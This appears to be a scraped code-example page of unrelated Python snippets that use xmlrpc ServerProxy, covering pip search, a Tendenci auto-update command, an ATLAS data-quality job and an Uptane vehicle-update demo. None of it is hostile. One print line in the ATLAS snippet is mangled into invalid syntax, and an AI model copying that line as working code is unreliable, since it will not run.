    submit_ecu_manifest_to_primary()
Ejemplo n.º 25
0
 def search(self, _query, options):
     index_url = options.index
     with self._build_session(options) as session:
         transport = PipXmlrpcTransport(index_url, session)
         pypi = xmlrpc_client.ServerProxy(index_url, transport)
         return pypi.search(self._spec, self._operator)
Ejemplo n.º 26
0
 def __init__(self, model):
     super(PyPIClient, self).__init__(model)
     self.client = xmlrpc_client.ServerProxy(self.url)
     self.session = requests.Session()
Ejemplo n.º 27
0
def connect(url, encoding='UTF-8', use_datetime=True, ssl_verify=True):
    context = None if ssl_verify else ssl._create_unverified_context()
    return xmlrpc.ServerProxy(url,
                              encoding=encoding,
                              use_datetime=use_datetime,
                              context=context)
Ejemplo n.º 28
0
    def handle(self, *args, **options):
        from tendenci.apps.site_settings.utils import get_setting

        pass_update_tendenci = False
        pass_update_tendenci_site = False
        is_uwsgi = False
        gunicorn_error_msg = None
        uwsgi_error_msg = None
        errors_list = []

        pypi = xmlrpc_client.ServerProxy('http://pypi.python.org/pypi')
        latest_version = pypi.package_releases('tendenci')[0]
        error_message = ""
        email_context = {
            'site_url': get_setting('site', 'global', 'siteurl'),
            'version': latest_version,
            'error_message': error_message
        }

        email_sender = get_setting(
            'site', 'global',
            'siteemailnoreplyaddress') or settings.DEFAULT_FROM_EMAIL
        email_recipient = ""
        user_id = options['user']
        if user_id and User.objects.filter(pk=user_id).exists():
            user = User.objects.get(pk=user_id)
            if user.email:
                email_recipient = user.email

        try:
            print("Updating tendenci")
            output = subprocess.check_output(
                "%s -m pip install -r requirements/tendenci.txt --upgrade" %
                python_executable(),
                stderr=subprocess.STDOUT,
                shell=True)
            print(output.decode())
            pass_update_tendenci = True

        except subprocess.CalledProcessError as e:
            errors_list.append(e.output.decode())

        # run deploy iff update_tendenci is successful
        if pass_update_tendenci:
            try:
                print("Updating tendenci site")
                call_command('migrate')
                call_command('deploy')
                pass_update_tendenci_site = True
            except CommandError as e:
                errors_list.append(e.output)

        # run reload if update is done
        if pass_update_tendenci_site:
            try:
                print("Restarting Server")
                subprocess.check_output(
                    "sudo systemctl restart %s" %
                    os.path.basename(settings.PROJECT_ROOT),
                    stderr=subprocess.STDOUT,
                    shell=True)

            except subprocess.CalledProcessError as e:
                gunicorn_error_msg = e.output.decode()
                if "reload: Unknown job:" in e.output.decode():
                    is_uwsgi = True

        # run usgi command iff it was proven that the site is using uwsgi instead
        if is_uwsgi:
            try:
                print("Restarting Server")
                subprocess.check_output(
                    "sudo touch /etc/uwsgi/vassals/%s.ini" %
                    os.path.basename(settings.PROJECT_ROOT),
                    stderr=subprocess.STDOUT,
                    shell=True)

            except subprocess.CalledProcessError as e:
                uwsgi_error_msg = e.output.decode()

        if gunicorn_error_msg and uwsgi_error_msg:
            errors_list.append(uwsgi_error_msg)
            errors_list.append(gunicorn_error_msg)

        try:
            print("Clearing cache")
            call_command('clear_cache')
        except CommandError as e:
            errors_list.append(e.output)

        email_context['errors_list'] = errors_list

        if email_recipient:
            subject = render_to_string(
                template_name='notification/update_tendenci_notice/short.txt',
                context=email_context)
            subject = subject.strip('\n').strip('\r')
            body = render_to_string(
                template_name='notification/update_tendenci_notice/full.html',
                context=email_context)
            email = EmailMessage()
            email.subject = subject
            email.body = body
            email.from_email = email_sender
            email.to = [email_recipient]
            email.content_subtype = 'html'
            email.send()
        else:
            for err in errors_list:
                print(err)
Ejemplo n.º 29
0
def dq_combined_trf(picklefile):

    tstart = time.time()

    print(
        "\n##################################################################")
    print("##              ATLAS Tier-0 Offline DQM Processing             ##")
    print(
        "##################################################################\n")

    print(
        "\n##################################################################")
    print("## STEP 1: creating file with list of root files ...")
    print(
        "##################################################################\n")

    # extract parameters from pickle file
    print("Using pickled file ", picklefile, " for input parameters")
    f = open(picklefile, 'r')
    parmap = pickle.load(f)
    f.close()

    print("\nFull Tier-0 run options:\n")
    pprint.pprint(parmap)

    inputfilelist = parmap.get('inputHistFiles', [])
    nfiles = len(inputfilelist)
    histMergeCompressionLevel = parmap.get('histMergeCompressionLevel', 1)
    histMergeDebugLevel = parmap.get('histMergeDebugLevel', 0)

    if not nfiles:  # problem with job definition or reading pickle file
        dt = int(time.time() - tstart)
        retcode = 1
        acronym = 'TRF_NOINPUT'
        txt = 'empty input file list'
        reportmap = {
            'prodsys': {
                'trfCode': retcode,
                'trfAcronym': acronym,
                'jobOutputs': [],
                'jobInputs': [],
                'nevents': 0,
                'more': {
                    'num1': 0,
                    'num2': dt,
                    'txt1': txt
                }
            }
        }

    else:
        histtmpflist = []
        nevts = 0

        if isinstance(inputfilelist[0], str):
            histtmpdsname = (inputfilelist[0]).split('#')[0]
            for val in inputfilelist:
                histtmpflist.append(val.split('#')[1])

        elif isinstance(inputfilelist[0], dict):
            histtmpdsname = inputfilelist[0]['dsn']
            for fdict in inputfilelist:
                histtmpflist.append(fdict['lfn'])
                nevt = fdict.get('events', 0)
                if nevt is None:
                    nevt = 0
                    print(
                        "WARNING Can't get number of events from input pickle file"
                    )
                nevts += nevt

        f = open('hist_merge.list', 'w')
        txtstr = ""
        for hf in histtmpflist:
            txtstr += "%s\n" % hf
        f.write(txtstr)
        f.close()

        cmd = "cat hist_merge.list"
        (s, o) = getstatusoutput(cmd)
        print("\nContents of file hist_merge.list:\n")
        print(o)

        print(
            "\n##################################################################"
        )
        print("## STEP 2: determining job parameters...")
        print(
            "##################################################################\n"
        )

        # output file
        histdsname = (parmap['outputHistFile']).split('#')[0]
        histfile = (parmap['outputHistFile']).split('#')[1]
        amitag = histfile.split('.')[5]

        # incremental mode on/off
        incr = parmap.get('incrementalMode', 'False')

        # post-processing on/off
        postproc = parmap.get('postProcessing', 'True')

        # database uploading on/off
        allowCOOLUpload = parmap.get('allowCOOLUpload', 'True')

        # do web display
        doWebDisplay = parmap.get('doWebDisplay', 'True')

        # production mode
        productionMode = parmap.get('productionMode', 'True')
        if productionMode != 'True' and incr == 'True':
            print("Production mode is not True, turning off incremental mode")
            incr = 'False'

        # get file paths, put into environment vars
        filepaths = parmap.get('filepaths', None)
        if filepaths and isinstance(filepaths, dict):
            if 'basename' not in filepaths:
                print("Improperly formed 'filepaths' (no 'basename')")
            else:
                for evtclass in ('Collisions', 'Cosmics', 'HeavyIons'):
                    if evtclass not in filepaths:
                        print("Improperly formed 'filepaths' (no '%s')" %
                              evtclass)
                    else:
                        clinfo = filepaths[evtclass]
                        for timeclass in ('run', 'minutes10', 'minutes30'):
                            if timeclass not in clinfo:
                                print(
                                    "Improperly formed 'filepaths[%s]' (no '%s')"
                                    % (evtclass, timeclass))
                            else:
                                dqcenvvar = 'DQC_HCFG_%s_%s' % (
                                    evtclass.upper(), timeclass.upper())
                                fpath = os.path.join(filepaths['basename'],
                                                     clinfo[timeclass])
                                print("Setting %s = %s" % (dqcenvvar, fpath))
                                os.environ[dqcenvvar] = fpath

        # extract info from dataset name
        # AMI project name
        # override if tag has been specified in parmap
        try:
            dqproject = histdsname.split('.')[0]
        except:
            dqproject = 'data_test'
        dqproject = parmap.get('projectTag', dqproject)

        # run number
        if 'runNumber' in parmap:
            runnr = parmap['runNumber']
        else:
            try:
                runnr = int(histdsname.split('.')[1])
            except:
                runnr = 1234567890

        # stream name
        if 'streamName' in parmap:
            stream = parmap['streamName']
        else:
            try:
                stream = histdsname.split('.')[2]
            except:
                stream = 'test_dummy'

        # processing pass number
        MAX_XMLRPC_TRIES = 5
        if 'procNumber' in parmap:
            procnumber = parmap['procNumber']
        else:
            n_xmlrpc_tries = 1
            while n_xmlrpc_tries <= MAX_XMLRPC_TRIES:
                procnumber = 99
                try:
                    xmlrpcserver = xmlrpclib.ServerProxy(
                        'http://atlasdqm.cern.ch:8888')
                    procnumber = xmlrpcserver.get_next_proc_pass(
                        runnr, stream, 'tier0')
                    break
                except:
                    print('Web service connection failed, attempt',
                          n_xmlrpc_tries, 'of', MAX_XMLRPC_TRIES)
                    n_xmlrpc_tries += 1
                    if n_xmlrpc_tries <= MAX_XMLRPC_TRIES:
                        time.sleep(20 * 2**n_xmlrpc_tries)

        print("Job parameters:\n")
        print("  Run number:      ", runnr)
        print("  Stream name:     ", stream)
        print("  Processing pass: "******"  Incremental mode:", incr)
        print("  Post-processing: ", postproc)
        print("  COOL uploads:    ", allowCOOLUpload)
        print("  Production mode: ", productionMode)

        print(
            "\n##################################################################"
        )
        print("## STEP 3: running histogram merging procedure ...")
        print(
            "##################################################################\n"
        )

        # environment setting
        os.environ['DQPRODUCTION'] = '1' if productionMode == 'True' else '0'
        os.environ['DQ_STREAM'] = stream
        print("Setting env variable DQPRODUCTION to %s\n" %
              os.environ['DQPRODUCTION'])
        os.environ[
            'COOLUPLOADS'] = '1' if allowCOOLUpload == 'True' and productionMode == 'True' else '0'
        print("Setting env variable COOLUPLOADS to %s\n" %
              os.environ['COOLUPLOADS'])

        if postproc == 'True':
            if incr == 'True':
                cmd = "python -u `which DQHistogramMerge.py` hist_merge.list %s 1 1 %d %d " % (
                    histfile, histMergeCompressionLevel, histMergeDebugLevel)
            else:
                cmd = "python -u `which DQHistogramMerge.py` hist_merge.list %s 1 0 %d %d" % (
                    histfile, histMergeCompressionLevel, histMergeDebugLevel)
        else:
            cmd = "python -u `which DQHistogramMerge.py` hist_merge.list %s 0 0 %d %d" % (
                histfile, histMergeCompressionLevel, histMergeDebugLevel)

        print("Histogram merging command:\n")
        print(cmd)
        print(
            "\n##################################################################\n"
        )

        print("## ... logfile from DQHistogramMerge.py: ")
        print(
            "--------------------------------------------------------------------------------"
        )
        # execute command
        retcode1 = os.system(cmd)
        print(
            "--------------------------------------------------------------------------------"
        )
        t1 = time.time()
        dt1 = int(t1 - tstart)

        print("\n## DQHistogramMerge.py finished with retcode = %s" % retcode1)
        print("## ... elapsed time: ", dt1, " sec")

        if retcode1 == 0:
            if postproc == 'True' and incr == 'False':
                print(
                    "\n##################################################################"
                )
                print("## STEP 3b: copying postprocessing output to AFS ...")
                print(
                    "##################################################################\n"
                )

                cmd = "python -u `which DQFileMove.py` %s %s_%s_%s" % (
                    dqproject, runnr, stream, procnumber)

                print("File move command:\n")
                print(cmd)
                print(
                    "\n##################################################################\n"
                )

                print("## ... logfile from DQFileMove.py: ")
                print(
                    "--------------------------------------------------------------------------------"
                )
                # execute command
                retcode1b = os.system(cmd)
                print(
                    "--------------------------------------------------------------------------------"
                )
                t1b = time.time()
                dt1b = int(t1b - t1)
                t1 = t1b

                print("\n## DQFileMove.py finished with retcode = %s" %
                      retcode1b)
                print("## ... elapsed time: ", dt1b, " sec")

            if doWebDisplay == 'True':
                print(
                    "\n##################################################################"
                )
                print("## STEP 4: running web-display creation procedure ...")
                print(
                    "##################################################################\n"
                )

                cmd = "python -u `which DQWebDisplay.py` %s %s %s %s stream=%s" % (
                    histfile, dqproject, procnumber, incr, stream)

                print("Web display creation command:\n")
                print(cmd)
                print(
                    "\n##################################################################\n"
                )

                print("## ... logfile from DQWebDisplay.py: ")
                print(
                    "--------------------------------------------------------------------------------"
                )
                # execute command
                retcode2 = os.system(cmd)
                print(
                    'DO NOT REPORT "Error in TH1: cannot merge histograms" ERRORS! THESE ARE IRRELEVANT!'
                )
                print(
                    "--------------------------------------------------------------------------------"
                )
                t2 = time.time()
                dt2 = int(t2 - t1)

                print("\n## DQWebDisplay.py finished with retcode = %s" %
                      retcode2)
                print("## ... elapsed time: ", dt2, " sec")
            else:
                print(
                    "\n##################################################################"
                )
                print("## WEB DISPLAY CREATION SKIPPED BY USER REQUEST")
                print(
                    "##################################################################\n"
                )
                retcode2 = 0
                dt2 = 0

        print(
            "\n##################################################################"
        )
        print("## STEP 5: finishing the job ...")
        print(
            "##################################################################\n"
        )

        # assemble report gpickle file
        outfiles = []
        infiles = []

        retcode = 0
        acronym = 'OK'
        txt = 'trf finished OK'

        # get info for report gpickle file
        if retcode1 == 0:
            dt = dt1
            if (retcode2 >> 8) in (0, 5):
                # if success, or if unable to acquire cache lock
                histmap = getFileMap(histfile, histdsname, nevts=nevts)
                outfiles = [histmap]
                dt += dt2
                if doWebDisplay == 'True':
                    print('Publishing to message service')
                    publish_success_to_mq(runnr,
                                          dqproject,
                                          stream,
                                          incr=(incr == 'True'),
                                          ami=amitag,
                                          procpass=procnumber,
                                          hcfg=filepaths,
                                          isprod=(productionMode == 'True'))
                else:
                    print('Web display off, not publishing to message service')
            else:
                txt = 'DQWebDisplay.py execution problem'
                print("ERROR: DQWebDisplay.py execution problem!")
                retcode = retcode2
                acronym = 'TRF_DQMDISPLAY_EXE'
                try:
                    infilelist = open('hist_merge.list', 'r')
                    for infname in infilelist:
                        genmd5sum(infname.rstrip(os.linesep))
                finally:
                    infilelist.close()
                genmd5sum(histfile)
        else:
            print("ERROR: DQHistogramMerge.py execution problem!")
            retcode = retcode1
            acronym = 'TRF_DQMHISTMERGE_EXE'
            dt = 0
            txt = 'DQHistogramMerge.py execution problem'
            try:
                infilelist = open('hist_merge.list', 'r')
                for infname in infilelist:
                    genmd5sum(infname.rstrip(os.linesep))
            finally:
                infilelist.close()
            genmd5sum(histfile)
            DQResFile = "DQResourceUtilization.txt"
            if os.path.exists(DQResFile):
                print("dumping resource utilization log")
                with open(DQResFile) as resfile:
                    for resline in resfile:
                        print(resline, end=' ')

        # assemble job report map
        reportmap = {
            'prodsys': {
                'trfCode': retcode,
                'trfAcronym': acronym,
                'jobOutputs': outfiles,
                'jobInputs': infiles,
                'nevents': int(nevts),
                'more': {
                    'num1': int(nevts),
                    'num2': int(dt),
                    'txt1': txt
                }
            }
        }

    # pickle report map
    f = open('jobReport.gpickle', 'w')
    pickle.dump(reportmap, f)
    f.close()

    print("\n## ... job finished with retcode : %s" %
          reportmap['prodsys']['trfCode'])
    print("## ... error acronym: ", reportmap['prodsys']['trfAcronym'])
    print("## ... elapsed time: ", reportmap['prodsys']['more']['num2'], "sec")
    print("##")
    print("##################################################################")
    print("## End of job.")
    print(
        "##################################################################\n")
Ejemplo n.º 30
0
def update_cycle():
    """
  """

    I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[update_cycle()]: ' + uptane.ENDCOLORS
    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Updating cycle')))
    #TODO: Until here

    #
    # FIRST: TIME
    #

    print(
        str('%s %s' % (
            I_TO_PRINT,
            'First, we\'ll send the Timeserver a request for a signed time, with the nonces Secondaries have sent us since last time.'
        )))

    # First, we'll send the Timeserver a request for a signed time, with the
    # nonces Secondaries have sent us since last time. (This also saves these
    # nonces as "sent" and empties the Primary's list of nonces to send.)
    nonces_to_send = primary_ecu.get_nonces_to_send_and_rotate()

    #TODO: Print to be deleted
    print(str('%s %s %s' % (I_TO_PRINT, 'nonces:', nonces_to_send)))
    #TODO: Until here

    tserver = xmlrpc_client.ServerProxy('http://' + str(demo.TIMESERVER_HOST) +
                                        ':' + str(demo.TIMESERVER_PORT))
    #if not server.system.listMethods():
    #  raise Exception('Unable to connect to server.')

    print('Submitting a request for a signed time to the Timeserver.')

    #TODO: Print to be deleted
    print(
        str('%s %s %s' % (
            I_TO_PRINT,
            'Sending GET get_signed_time_der/get_signed_time request to TIMESERVER in port:',
            demo.TIMESERVER_PORT)))
    #TOOD: Until here

    if tuf.conf.METADATA_FORMAT == 'der':  # TODO: Should check setting in Uptane.
        time_attestation = tserver.get_signed_time_der(nonces_to_send).data

    else:
        time_attestation = tserver.get_signed_time(nonces_to_send)

    # At this point, time_attestation might be a simple Python dictionary or
    # a DER-encoded ASN.1 representation of one.

    #TODO: Print to be deleted
    print(
        str('%s %s' % (
            I_TO_PRINT,
            'Updating time for Primary_ECU with time_attestation recieved from server'
        )))
    #TOOD: Until here

    # This validates the attestation and also saves the time therein (if the
    # attestation was valid), causing this client to use that time for future
    # metadata expiration checks. Secondaries can request this from the Primary
    # at will.
    primary_ecu.update_time(time_attestation)

    #TODO: Print to be deleted
    print(
        str('%s %s' %
            (I_TO_PRINT, 'Time attestation validated. New time registered.')))
    #TOOD: Until here

    print('Time attestation validated. New time registered.')

    #TODO: Print to be deleted
    print(
        str('%s %s' %
            (I_TO_PRINT, 'Starting DOWNLOADING METADATA AND IMAGES PROCESS')))
    #TOOD: Until here

    #
    # SECOND: DOWNLOAD METADATA AND IMAGES
    #

    # Starting with just the root.json files for the Director and Image Repos, and
    # pinned.json, the client will now use TUF to connect to each repository and
    # download/update top-level metadata. This call updates metadata from both
    # repositories.
    # upd.refresh()
    print(GREEN + '\n')
    print(' Now updating top-level metadata from the Director and Image '
          'Repositories\n    (timestamp, snapshot, root, targets)\n' +
          ENDCOLORS)

    # This will update the Primary's metadata and download images from the
    # Director and Image Repositories, and create a mapping of assignments from
    # each Secondary ECU to its Director-intended target.
    try:
        primary_ecu.primary_update_cycle()

    # Print a REPLAY or DEFENDED banner if ReplayedMetadataError or
    # BadSignatureError is raised by primary_update_cycle().  These banners are
    # only triggered for bad Timestamp metadata, and all other exception are
    # re-raised.
    except tuf.NoWorkingMirrorError as exception:
        director_file = os.path.join(_vin, 'metadata',
                                     'timestamp' + demo.METADATA_EXTENSION)
        for mirror_url in exception.mirror_errors:
            if mirror_url.endswith(director_file):
                if isinstance(exception.mirror_errors[mirror_url],
                              tuf.ReplayedMetadataError):
                    print_banner(
                        BANNER_REPLAY,
                        color=WHITE + BLACK_BG,
                        text=
                        'The Director has instructed us to download a Timestamp'
                        ' that is older than the currently trusted version. This'
                        ' instruction has been rejected.',
                        sound=TADA)

                elif isinstance(exception.mirror_errors[mirror_url],
                                tuf.BadSignatureError):
                    print_banner(
                        BANNER_DEFENDED,
                        color=WHITE + DARK_BLUE_BG,
                        text=
                        'The Director has instructed us to download a Timestamp'
                        ' that is signed with keys that are untrusted.  This metadata has'
                        ' been rejected.',
                        sound=TADA)

                else:
                    raise

    # All targets have now been downloaded.

    # Generate and submit vehicle manifest.
    generate_signed_vehicle_manifest()
    submit_vehicle_manifest_to_director()

    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Returning...')))